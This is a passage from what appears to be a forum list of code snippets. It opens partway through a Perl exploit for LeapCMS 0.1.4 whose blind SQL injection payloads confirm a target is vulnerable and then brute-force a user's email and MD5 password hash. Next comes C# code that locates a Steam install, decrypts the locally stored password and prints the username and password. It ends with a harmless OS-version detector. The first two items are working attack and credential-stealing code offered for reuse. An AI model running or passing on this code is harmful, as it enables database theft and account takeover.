$searchinjected="searchterm=".$search."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/1=1#"; #injected code $output=&request($finalrequest, $searchinjected); if ( $output =~ (/No Results Found./)) { print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tThis Web is not vulnerable!\n"; print "\t--->Maybe:\n"; print "\t1.-Patched or gpc_magic_quotes=off\n"; print "\t2.-Search parameter hasn't found. Try other!\n"; print "\tEXPLOIT FAILED!\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n"; exit(1); }else{ print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tWeb is vulnerable!\n"; print "\tTested Blind SQL Injection.\n"; print "\tChecking id user...\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n"; } #Test if user exists my $searchinjected="searchterm=".$search."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/(SELECT/*y3nh4ck3r*/COUNT(*)/*y3nh4ck3r*/FROM/*y3nh4ck3r*/users/*y3nh4ck3r*/WHERE/*y3nh4ck3r*/id='".$idhacked."')#"; #injected code $output=&request($$finalrequest,$searchinjected); if ( $output =~ (/No Results Found./)) { print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tUser doesn't exists!\n"; print "\tEXPLOIT FAILED!\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n"; exit(1); }else{ print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tOK...The user exists!\n"; print "\tStarting exploit...\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tWait several minutes...\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n"; } #Bruteforcing user... $length_mail=&lengthuser($finalrequest,$idhacked,$search); $email=&bruteforcing($finalrequest,$idhacked,$length_mail,'mail',$search); if(length($email)!=$length_mail) { print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tEXPLOIT FAILED!\n"; print "\tFatal error: Different length email!\n"; print "\tCause: Maybe you have to include more characters on bruteforcing...\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n"; exit(1); } print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tGot user!\n"; print "\tBruteforcing password hash (md5)...\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n"; #Bruteforcing password... $passhash=&bruteforcing($finalrequest,$idhacked,32,'pwd',$search); #it isn't needed length print "\n\t\t*************************************************\n"; print "\t\t**** EXPLOIT EXECUTED (LeapCMS 0.1.4 BSQLi) ****\n"; print "\t\t*************************************************\n\n"; print "\t\tUser-id:".$idhacked."\n"; print "\t\tE-mail:".$email."\n"; print "\t\tUser-password(hash):".$passhash."\n\n"; print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"; print "\t\t<<---------------Thanks to: y3hn4ck3r-------------->>\n\n"; print "\t\t<<------------------------EOF---------------------->>\n\n"; exit(1); #
  24. // steam decrypt // // snippet by t0fx & lolita // // give credits // using System; using System.IO; using System.Runtime.InteropServices; using System.Text; using Microsoft.Win32; namespace steam_decrypt { class Program { [DllImport("Steam.dll", CallingConvention = CallingConvention.Cdecl)] public static extern int SteamDecryptDataForThisMachine(string encryptedData, int encryptedDataSize, StringBuilder decryptedBuffer, int decryptedBufferSize, ref int decryptedDataSize); static void Main(string[] args) { try { RegistryKey rksteam = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Valve\\Steam", true); if (rksteam != null) { string steaMpath = (string)rksteam.GetValue("SteamPath"); if (File.Exists(Environment.CurrentDirectory + "\\Steam.dll") == false) { File.Copy(steaMpath + "\\Steam.dll", Environment.CurrentDirectory + "\\Steam.dll", true); } string[] data = File.ReadAllLines(steaMpath + "\\config\\SteamAppData.vdf"); for (int pos = 0; pos < data.Length; pos++) { if (data[pos].Contains("User")) { string[] info = System.Text.RegularExpressions.Regex.Replace(data[pos], @"\s+", " ").Split(' '); if (info[2] != null) { string username = info[2].TrimEnd('"').TrimStart('"'); Console.WriteLine("Username : " + username); } } } string sInhalt = File.ReadAllText(steaMpath + "\\ClientRegistry.blob"); int Phrase; Phrase = sInhalt.IndexOf("Phrase", 1); sInhalt = Mid(sInhalt, Phrase + 40); string encpwd = Left(sInhalt, 92).Trim(); int decryptedDataSize = 0; StringBuilder pwd = new StringBuilder(); pwd.Length = encpwd.Length / 2; if (SteamDecryptDataForThisMachine(encpwd, encpwd.Length, pwd, pwd.Length, ref decryptedDataSize) == 0) { Console.WriteLine("Password : " + pwd); } else { Console.WriteLine("error : Error decrypting the Steam Password."); } } Console.ReadLine(); } catch (Exception g) { try { const string steaMpath = ("@C:\\Program Files\\Steam"); File.Copy(steaMpath + "\\Steam.dll", Environment.CurrentDirectory + "\\Steam.dll", true); string[] data = File.ReadAllLines(steaMpath + "\\config\\SteamAppData.vdf"); for (int pos = 0; pos < data.Length; pos++) { if (data[pos].Contains("User")) { string[] info = System.Text.RegularExpressions.Regex.Replace(data[pos], @"\s+", " ").Split(' '); if (info[2] != null) { string username = info[2].TrimEnd('"').TrimStart('"'); Console.WriteLine("Username : " + username); } } } string sInhalt = File.ReadAllText(steaMpath + "\\ClientRegistry.blob"); int Phrase; Phrase = sInhalt.IndexOf("Phrase", 1); sInhalt = Mid(sInhalt, Phrase + 40); string encpwd = Left(sInhalt, 92).Trim(); int decryptedDataSize = 0; StringBuilder pwd = new StringBuilder(); pwd.Length = encpwd.Length / 2; if (SteamDecryptDataForThisMachine(encpwd, encpwd.Length, pwd, pwd.Length, ref decryptedDataSize) == 0) { Console.WriteLine("Password : " + pwd); } else { Console.WriteLine("Error decrypting the Steam Password."); } Console.ReadLine(); } catch (Exception h) { Console.WriteLine("Steam not installed or password not stored"); } } } public static string Left(string param, int length) { string result = param.Substring(0, length); return result; } public static string Mid(string param, int startIndex) { string result = param.Substring(startIndex); return result; } } }
  25. // snippet by t0fx // // give credits if u use it // using System; namespace GetOS { class Program { static void Main(string[] args) { OperatingSystem osInfo = Environment.OSVersion; string os = osInfo.ToString(); try { if (os.StartsWith("Microsoft Windows NT 6.0.6000.0")) { Console.WriteLine(os.Replace("Microsoft Windows NT 6.0.6000.0", "Vista Enterprise")); } if (os.StartsWith("Microsoft Windows NT 5.1.2600")) { Console.WriteLine( os.Replace("Microsoft Windows NT 5.1.2600", "Windows XP")); } if (os.StartsWith("Microsoft Windows 4.10.1998")) { Console.WriteLine( os.Replace("Microsoft Windows NT 5.1.2600", "Windows 98")); } if (os.StartsWith("Microsoft Windows 4.10.2222")) { Console.WriteLine( os.Replace("Microsoft Windows 4.10.2222", "Windows 98 SE")); } if (os.StartsWith("Microsoft Windows NT 5.0.2195")) { Console.WriteLine( os.Replace("Microsoft Windows NT 5.0.2195", "Windows 2000")); } if (os.StartsWith("Microsoft Windows 4.90.3000")) { Console.WriteLine( os.Replace("Microsoft Windows 4.90.3000", "Windows Me")); } if (os.StartsWith("Microsoft Windows NT 5.2.3790")) { Console.WriteLine( os.Replace("Microsoft Windows NT 5.2.3790", "Windows XP 64-bit Edition 2003")); } if (os.StartsWith("Microsoft Windows NT 5.2.3790")) { Console.WriteLine( os.Replace("Microsoft Windows NT 5.2.3790", "Windows Server 2003")); } if (os.StartsWith("Microsoft Windows NT 5.2.3790")) { Console.WriteLine( os.Replace("Microsoft Windows NT 5.2.3790", "Windows XP Professional x64 Edition")); } if (os.StartsWith("Microsoft Windows NT 6.0.6001")) { Console.WriteLine( os.Replace("Microsoft Windows NT 6.0.6001", "Windows Vista")); } if (os.StartsWith("Microsoft Windows NT 5.2.4500")) { Console.WriteLine( os.Replace("Microsoft Windows NT 5.2.4500", "Windows Home Server")); } if (os.StartsWith("Microsoft Windows NT 6.1.7100")) { Console.WriteLine( os.Replace("Microsoft Windows NT 6.1.7100", "Windows Seven")); } } catch (Exception k) { Console.WriteLine("Error : " k); } } } }
×
×
  • Create New...